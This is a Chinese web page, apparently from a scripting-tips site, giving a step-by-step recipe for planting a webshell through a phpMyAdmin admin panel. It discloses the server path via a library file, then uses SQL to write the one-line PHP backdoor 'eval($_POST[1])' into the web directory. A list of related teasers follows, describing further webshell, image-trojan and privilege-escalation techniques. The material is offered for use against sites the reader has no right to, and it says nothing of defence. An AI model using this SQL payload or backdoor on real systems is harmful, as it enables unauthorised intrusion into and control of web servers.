phpMyAdmin 后台拿webshell
1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
相关推荐
-
phpMyAdmin 后台拿webshell
1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>'); select cmd from a into outfile
-
从后台到webshell的一点思路
主要是利用后台对access数据库的"备份数据库"或"恢复数据库"功能,"备份的数据库路径"等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用.具体方法和分析可以参考angel的文章<动网论坛7.0获得WebShell的分析>.据我所知,目前还有很多的asp程序后台存在这样的漏洞,利用方法大同小异. php+mysql程序 ① 利用后
-
dvbbs7.1 照样从后台得到webshell
文章作者:喜欢忧伤 信息来源:邪恶八进制安全小组 背景: dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了 解决办法: 我把asp木马插入到数据库里,然后恢复.这样肯定检查肯定可以通过的. 具体过程: 前提: (偶以默认的安装情况为准,具体情况的把握靠自己了.) 你得到论坛dvbbs7.1后台. 1.偶已经作好一个数据库了:里面插入了加密的asp后门[就是那个写马的后门] 同时已经修改名字成dvbbsToshell.gif(文章最后有下载)了
-
wordpress网站转移到本地运行测试的方法
作为站长而言,有时候我们可能会碰到更换服务器或者为网站做一个整体布局修改和升级,我们首先需要做的就是对数据库和整个wordpress网站的 主题和插件等等相关文件进行本地备份.个人认为如果要对网站进行比较大的改动,比如更换网站框架或者网站结构,最好将整个网站转移到本地进行相关的运行测 试,这样做可以保证修改的进度和效率,无需每次都要将修改的效果反复上传覆盖,你可以将整个网站测试完毕后再进行最终的上传. 那么我们如何将ftp服务器上的wordpress网站转移到本地呢?其实主要还是数据库修改的问题
-
让你变成ASP木马高手
1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(
-
phpBB 2.0.13惊现漏洞的解决
一.Path Disclosure 漏洞文件:/db/oracle.php 漏洞描叙:直接访问oracle.php,导致暴露web路径 涉及版本:phpbb <=2.013 测试:ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误: Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\oracle.php on line 405 解决办法 如果你不是采用的or
-
利用BBSxp后台的缺陷得到webshell
遇一BBSXP后台: 查看源文件.也没有value可以自定义. 尝试修改上传类型. 无奈不支持php aspx. 向数据库里插入一句话再备份. 出现些XXX 估计表里加入了什么东.. 访问: /bbs/Admin_fso.asp?menu=files&dir=../ 可以看到整站文件.. 找到一个文件名不常见的后台.. 运气不错. 备份webshell之..
-
DVBBS7.1后台备份得到一个webshell
转自:http://www.wrsky.com/read.php?tid=565 作者:firefox+lvhuana 今天上午上网的时候,非常无聊,好友都不在线. 正在无聊的时候,突然qq响了,一个陌生人要加我,顺便先看下他的资料,哦哦,原来这个人还有个人站点呢,通过他加我请求.然后开始看他的个人站点,原来是一个外挂站,晕糊中,外挂站点的人加我作什么.... 想想进他的站点看看吧,打开明小子的旁注工具2.2版本(这个启动速度快,我喜欢),扫了一下,看到他站点所在的服务器上面还有几个站点,再仔细
-
获得leadbbs论坛站webshell后进后台最简便之法
本文已经发表于<黑客手册>(非安全)杂志上,版权归其所有!转载注名! 其实ASP论坛中,我最喜欢就是leadbbs,稳定.速度快,占的空间也不大,比起庞大的DVBBS可小多了,说起安全来,它也很不错的,虽然在早版本里有过可以修改管理员密码的漏洞(俗称移花接木),但是从那至今它的安全性还是非常可以让大家肯定的,可能你会说前几天开始闹cookie欺骗漏洞呢,但是这最多也只是进了前台,后台一般还是无能为力的,高手在其面前也不得不服啊.呵呵,上面是题外话,今天我不是详说它安全性的,{www.xker.
-
超全的webshell权限提升方法
WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆 c:\Pr
随机推荐
- Nginx的使用经验小结
- jquery取子节点及当前节点属性值的方法
- perl中srand()与time的函数使用方法介绍
- Asp.net的应用程序对象和页面生存周期
- javascript 文字上下间隔滚动的代码 符合WEB标准 脚本之家修正版
- HTML5之WebSocket入门3 -通信模型socket.io
- ASP.NET配置文件Web.config用法详解
- ThinkPHP中公共函数路径和配置项路径的映射分析
- PHP生成随机字符串(3种方法)
- 开启Javascript中apply、call、bind的用法之旅模式
- Node.js与MySQL交互操作及其注意事项
- 深入理解Java的Spring框架中的IOC容器
- 从零开始学习jQuery (十) jQueryUI常用功能实战
- C#给图片添加水印完整实例
- 微信小程序 跳转传递数据的实例
- jquery 利用show和hidden实现级联菜单示例代码
- jQuery插件Echarts实现的渐变色柱状图
- js验证符合用户体验的网页表单特效
- win2003 iis6 iis假死
- 基于chosen插件实现人员选择树搜索自动筛选功能